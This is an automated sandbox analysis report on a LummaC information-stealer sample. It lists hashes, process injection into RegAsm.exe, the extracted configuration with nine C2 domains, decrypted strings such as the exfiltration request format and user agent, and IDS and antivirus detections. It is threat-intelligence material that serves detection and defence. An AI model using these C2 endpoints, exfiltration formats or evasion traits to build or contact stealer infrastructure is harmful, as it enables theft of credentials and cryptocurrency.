Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
3ZD5tEC5DH.exe

Overview

General Information

Sample name:3ZD5tEC5DH.exe
renamed because original name is a hash value
Original sample name:149131a90f99225e6c7e28a06164dd9a.exe
Analysis ID:1519286
MD5:149131a90f99225e6c7e28a06164dd9a
SHA1:f9d0e7ae3bed79498bf4da92c0ef9568d4e5595e
SHA256:6b176bab868dc372496ab3c6ce97518d276c17143f77ae15c992970c1efdf21f
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
.NET source code contains very large array initializations
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Injects a PE file into a foreign processes
LummaC encrypted strings found
Sample uses string decryption to hide its real strings
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the clipboard data
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • 3ZD5tEC5DH.exe (PID: 404 cmdline: "C:\Users\user\Desktop\3ZD5tEC5DH.exe" MD5: 149131A90F99225E6C7E28A06164DD9A)
    • conhost.exe (PID: 972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegAsm.exe (PID: 5396 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["offensivedzvju.shop", "gutterydhowi.shop", "stogeneratmns.shop", "lootebarrkeyn.shop", "vozmeatillu.shop", "ghostreedmnu.shop", "drawzhotdog.shop", "fragnantbui.shop", "reinforcenh.shop"], "Build id": "FATE99--"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

    Sigma Signatures

    No Sigma rule has matched

    Suricata Signatures

    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-09-26T09:58:37.940927+020020546531A Network Trojan was detected192.168.2.649710104.21.4.136443TCP
    2024-09-26T09:58:38.867301+020020546531A Network Trojan was detected192.168.2.649711188.114.97.3443TCP
    2024-09-26T09:58:39.963391+020020546531A Network Trojan was detected192.168.2.649713188.114.96.3443TCP
    2024-09-26T09:58:40.955377+020020546531A Network Trojan was detected192.168.2.649714188.114.96.3443TCP
    2024-09-26T09:58:41.923134+020020546531A Network Trojan was detected192.168.2.649715172.67.162.108443TCP
    2024-09-26T09:58:42.899946+020020546531A Network Trojan was detected192.168.2.649716188.114.96.3443TCP
    2024-09-26T09:58:43.844049+020020546531A Network Trojan was detected192.168.2.649717188.114.96.3443TCP
    2024-09-26T09:58:44.808684+020020546531A Network Trojan was detected192.168.2.649718172.67.208.139443TCP
    2024-09-26T09:58:47.045311+020020546531A Network Trojan was detected192.168.2.649720172.67.189.2443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-09-26T09:58:37.940927+020020498361A Network Trojan was detected192.168.2.649710104.21.4.136443TCP
    2024-09-26T09:58:38.867301+020020498361A Network Trojan was detected192.168.2.649711188.114.97.3443TCP
    2024-09-26T09:58:39.963391+020020498361A Network Trojan was detected192.168.2.649713188.114.96.3443TCP
    2024-09-26T09:58:40.955377+020020498361A Network Trojan was detected192.168.2.649714188.114.96.3443TCP
    2024-09-26T09:58:41.923134+020020498361A Network Trojan was detected192.168.2.649715172.67.162.108443TCP
    2024-09-26T09:58:42.899946+020020498361A Network Trojan was detected192.168.2.649716188.114.96.3443TCP
    2024-09-26T09:58:43.844049+020020498361A Network Trojan was detected192.168.2.649717188.114.96.3443TCP
    2024-09-26T09:58:44.808684+020020498361A Network Trojan was detected192.168.2.649718172.67.208.139443TCP
    2024-09-26T09:58:47.045311+020020498361A Network Trojan was detected192.168.2.649720172.67.189.2443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-09-26T09:58:41.445111+020020561571Domain Observed Used for C2 Detected192.168.2.649715172.67.162.108443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-09-26T09:58:42.419788+020020561551Domain Observed Used for C2 Detected192.168.2.649716188.114.96.3443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-09-26T09:58:38.424964+020020561631Domain Observed Used for C2 Detected192.168.2.649711188.114.97.3443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-09-26T09:58:37.420292+020020561651Domain Observed Used for C2 Detected192.168.2.649710104.21.4.136443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-09-26T09:58:39.502747+020020561611Domain Observed Used for C2 Detected192.168.2.649713188.114.96.3443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-09-26T09:58:44.319186+020020561511Domain Observed Used for C2 Detected192.168.2.649718172.67.208.139443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-09-26T09:58:43.400411+020020561531Domain Observed Used for C2 Detected192.168.2.649717188.114.96.3443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-09-26T09:58:40.443849+020020561591Domain Observed Used for C2 Detected192.168.2.649714188.114.96.3443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-09-26T09:58:40.957085+020020561561Domain Observed Used for C2 Detected192.168.2.6581081.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-09-26T09:58:41.924937+020020561541Domain Observed Used for C2 Detected192.168.2.6653461.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-09-26T09:58:37.948460+020020561621Domain Observed Used for C2 Detected192.168.2.6622811.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-09-26T09:58:36.830747+020020561641Domain Observed Used for C2 Detected192.168.2.6598861.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-09-26T09:58:36.812587+020020560481Domain Observed Used for C2 Detected192.168.2.6520181.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-09-26T09:58:38.871156+020020561601Domain Observed Used for C2 Detected192.168.2.6635041.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-09-26T09:58:43.845719+020020561501Domain Observed Used for C2 Detected192.168.2.6554771.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-09-26T09:58:42.902228+020020561521Domain Observed Used for C2 Detected192.168.2.6651271.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-09-26T09:58:39.967673+020020561581Domain Observed Used for C2 Detected192.168.2.6507391.1.1.153UDP

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Antivirus detection for URL or domain
    Source: https://steamcommunity.com/profiles/76561199724331900URL Reputation: Label: malware
    Source: https://steamcommunity.com/profiles/76561199724331900/inventory/URL Reputation: Label: malware
    Source: https://steamcommunity.com/profiles/76561199724331900/badgesURL Reputation: Label: malware
    Source: lootebarrkeyn.shopAvira URL Cloud: Label: malware
    Source: https://drawzhotdog.shop/apiAvira URL Cloud: Label: malware
    Source: stogeneratmns.shopAvira URL Cloud: Label: malware
    Source: https://gutterydhowi.shop/apiAvira URL Cloud: Label: malware
    Source: reinforcenh.shopAvira URL Cloud: Label: malware
    Source: https://performenj.shop/6&Avira URL Cloud: Label: malware
    Source: https://offensivedzvju.shop/Avira URL Cloud: Label: malware
    Source: https://reinforcenh.shop/d&Avira URL Cloud: Label: malware
    Source: https://reinforcenh.shop/apiAvira URL Cloud: Label: malware
    Source: https://stogeneratmns.shop/&-7Avira URL Cloud: Label: malware
    Source: https://vozmeatillu.shop/Avira URL Cloud: Label: malware
    Source: https://offensivedzvju.shop/WAvira URL Cloud: Label: malware
    Source: https://drawzhotdog.shop/Avira URL Cloud: Label: malware
    Source: ghostreedmnu.shopAvira URL Cloud: Label: malware
    Source: https://ghostreedmnu.shop/Avira URL Cloud: Label: malware
    Source: https://performenj.shop/piAvira URL Cloud: Label: malware
    Source: https://gutterydhowi.shop/apiOAvira URL Cloud: Label: malware
    Source: https://performenj.shop/Avira URL Cloud: Label: malware
    Source: https://stogeneratmns.shop/apiAvira URL Cloud: Label: malware
    Source: https://vozmeatillu.shop/apiAvira URL Cloud: Label: malware
    Source: gutterydhowi.shopAvira URL Cloud: Label: malware
    Source: https://ghostreedmnu.shop/apiAvira URL Cloud: Label: malware
    Source: https://offensivedzvju.shop/apiAvira URL Cloud: Label: malware
    Source: fragnantbui.shopAvira URL Cloud: Label: malware
    Source: offensivedzvju.shopAvira URL Cloud: Label: malware
    Source: https://fragnantbui.shop/apiAvira URL Cloud: Label: malware
    Source: drawzhotdog.shopAvira URL Cloud: Label: malware
    Source: https://performenj.shop/apitAvira URL Cloud: Label: malware
    Source: https://performenj.shop/apiAvira URL Cloud: Label: malware
    Source: https://stogeneratmns.shop/apiJAvira URL Cloud: Label: malware
    Source: vozmeatillu.shopAvira URL Cloud: Label: malware
    Found malware configuration
    Source: 3.2.RegAsm.exe.400000.0.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["offensivedzvju.shop", "gutterydhowi.shop", "stogeneratmns.shop", "lootebarrkeyn.shop", "vozmeatillu.shop", "ghostreedmnu.shop", "drawzhotdog.shop", "fragnantbui.shop", "reinforcenh.shop"], "Build id": "FATE99--"}
    Multi AV Scanner detection for submitted file
    Source: 3ZD5tEC5DH.exeReversingLabs: Detection: 47%
    AI detected suspicious sample
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
    Sample uses string decryption to hide its real strings
    Source: 3.2.RegAsm.exe.400000.0.raw.unpackString decryptor: reinforcenh.shop
    Source: 3.2.RegAsm.exe.400000.0.raw.unpackString decryptor: stogeneratmns.shop
    Source: 3.2.RegAsm.exe.400000.0.raw.unpackString decryptor: fragnantbui.shop
    Source: 3.2.RegAsm.exe.400000.0.raw.unpackString decryptor: drawzhotdog.shop
    Source: 3.2.RegAsm.exe.400000.0.raw.unpackString decryptor: vozmeatillu.shop
    Source: 3.2.RegAsm.exe.400000.0.raw.unpackString decryptor: offensivedzvju.shop
    Source: 3.2.RegAsm.exe.400000.0.raw.unpackString decryptor: ghostreedmnu.shop
    Source: 3.2.RegAsm.exe.400000.0.raw.unpackString decryptor: gutterydhowi.shop
    Source: 3.2.RegAsm.exe.400000.0.raw.unpackString decryptor: lootebarrkeyn.shop
    Source: 3.2.RegAsm.exe.400000.0.raw.unpackString decryptor: lid=%s&j=%s&ver=4.0
    Source: 3.2.RegAsm.exe.400000.0.raw.unpackString decryptor: TeslaBrowser/5.5
    Source: 3.2.RegAsm.exe.400000.0.raw.unpackString decryptor: - Screen Resoluton:
    Source: 3.2.RegAsm.exe.400000.0.raw.unpackString decryptor: - Physical Installed Memory:
    Source: 3.2.RegAsm.exe.400000.0.raw.unpackString decryptor: Workgroup: -
    Source: 3.2.RegAsm.exe.400000.0.raw.unpackString decryptor: FATE99--
    Source: 3ZD5tEC5DH.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: unknownHTTPS traffic detected: 104.21.4.136:443 -> 192.168.2.6:49710 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49711 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49713 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49714 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.162.108:443 -> 192.168.2.6:49715 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49716 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49717 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.208.139:443 -> 192.168.2.6:49718 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49719 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.189.2:443 -> 192.168.2.6:49720 version: TLS 1.2
    Source: 3ZD5tEC5DH.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp eax3_2_00447600
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx3_2_0044A7E0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+1Ch]3_2_0040FEBC
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then xor eax, eax3_2_0040EFFC
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+00000120h]3_2_0040EFFC
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then push ebx3_2_00415078
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ecx, byte ptr [esp+34h]3_2_00401000
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh3_2_004450E0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al3_2_004340F5
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al3_2_004340F5
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edi, byte ptr [eax+esi]3_2_00407120
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx3_2_0042A274
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [edx], ax3_2_0042A274
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]3_2_0040D2C0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx3_2_0042A2F9
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [edx], ax3_2_0042A2F9
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx eax, word ptr [esi+ecx]3_2_00442280
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx3_2_0042A345
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [edx], ax3_2_0042A345
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]3_2_0042A345
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h3_2_00431370
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebx, eax3_2_0040A3C0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebp, eax3_2_0040A3C0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], CECD21FDh3_2_0042C390
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh3_2_0042C390
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 0633C81Dh3_2_00449390
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]3_2_00449390
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]3_2_00424490
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [edi+eax+02h], 0000h3_2_004204A0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], dx3_2_004204A0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, esi3_2_0042D56C
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ebx, byte ptr [edx]3_2_0043B510
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+000006A8h]3_2_0041E52C
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, esi3_2_0042D58E
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]3_2_0042F5B7
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi]3_2_004146B5
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [ecx+eax]3_2_0040F7E0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al3_2_004327B0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+20h]3_2_004327B0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al3_2_004327B0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al3_2_004327B0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al3_2_004327B0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al3_2_004327B0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], al3_2_004327B0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], al3_2_004327B0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al3_2_004327B0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edx], cl3_2_004327B0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov dword ptr [esp], 00000000h3_2_0041A880
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp al, 2Eh3_2_0042C891
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then xor eax, eax3_2_0042C891
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 1B788DCFh3_2_00444970
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 54CA534Eh3_2_004489F0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], al3_2_00434A2F
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 0633C81Dh3_2_00445AD0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi]3_2_00413AE6
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebx, ecx3_2_00413AE6
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp byte ptr [edi], 00000000h3_2_00413AE6
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+0Ch]3_2_0042BB00
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp edx3_2_00427B0F
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]3_2_00430BD0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ecx, word ptr [edi+eax]3_2_00448BE0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h3_2_0044AC00
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]3_2_00404C10
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h3_2_00426CA0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then add edi, 02h3_2_0041DD64
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebx]3_2_0041DD64
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esi+ebx]3_2_00405D20
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], al3_2_00434DF6
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+0Ch]3_2_00445D80
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h3_2_0044AD90
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]3_2_00449E60
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp byte ptr [ebx], 00000000h3_2_00414E26
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then xor eax, eax3_2_00414E26
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]3_2_00447EDE
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]3_2_0044AF10
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 81105F7Ah3_2_0044AF10
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx3_2_00426F20
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [edi+eax+02h], 0000h3_2_0041CFF0

    Networking

    barindex
    Suricata IDS alerts for network traffic
    Source: Network trafficSuricata IDS: 2056160 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (offensivedzvju .shop) : 192.168.2.6:63504 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056162 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ghostreedmnu .shop) : 192.168.2.6:62281 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056048 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (lootebarrkeyn .shop) : 192.168.2.6:52018 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056161 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (offensivedzvju .shop in TLS SNI) : 192.168.2.6:49713 -> 188.114.96.3:443
    Source: Network trafficSuricata IDS: 2056159 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (vozmeatillu .shop in TLS SNI) : 192.168.2.6:49714 -> 188.114.96.3:443
    Source: Network trafficSuricata IDS: 2056151 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (reinforcenh .shop in TLS SNI) : 192.168.2.6:49718 -> 172.67.208.139:443
    Source: Network trafficSuricata IDS: 2056153 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (stogeneratmns .shop in TLS SNI) : 192.168.2.6:49717 -> 188.114.96.3:443
    Source: Network trafficSuricata IDS: 2056163 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (ghostreedmnu .shop in TLS SNI) : 192.168.2.6:49711 -> 188.114.97.3:443
    Source: Network trafficSuricata IDS: 2056164 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (gutterydhowi .shop) : 192.168.2.6:59886 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056158 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vozmeatillu .shop) : 192.168.2.6:50739 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056157 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawzhotdog .shop in TLS SNI) : 192.168.2.6:49715 -> 172.67.162.108:443
    Source: Network trafficSuricata IDS: 2056154 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fragnantbui .shop) : 192.168.2.6:65346 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056150 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (reinforcenh .shop) : 192.168.2.6:55477 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056152 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (stogeneratmns .shop) : 192.168.2.6:65127 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056155 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fragnantbui .shop in TLS SNI) : 192.168.2.6:49716 -> 188.114.96.3:443
    Source: Network trafficSuricata IDS: 2056165 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (gutterydhowi .shop in TLS SNI) : 192.168.2.6:49710 -> 104.21.4.136:443
    Source: Network trafficSuricata IDS: 2056156 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawzhotdog .shop) : 192.168.2.6:58108 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49717 -> 188.114.96.3:443
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49710 -> 104.21.4.136:443
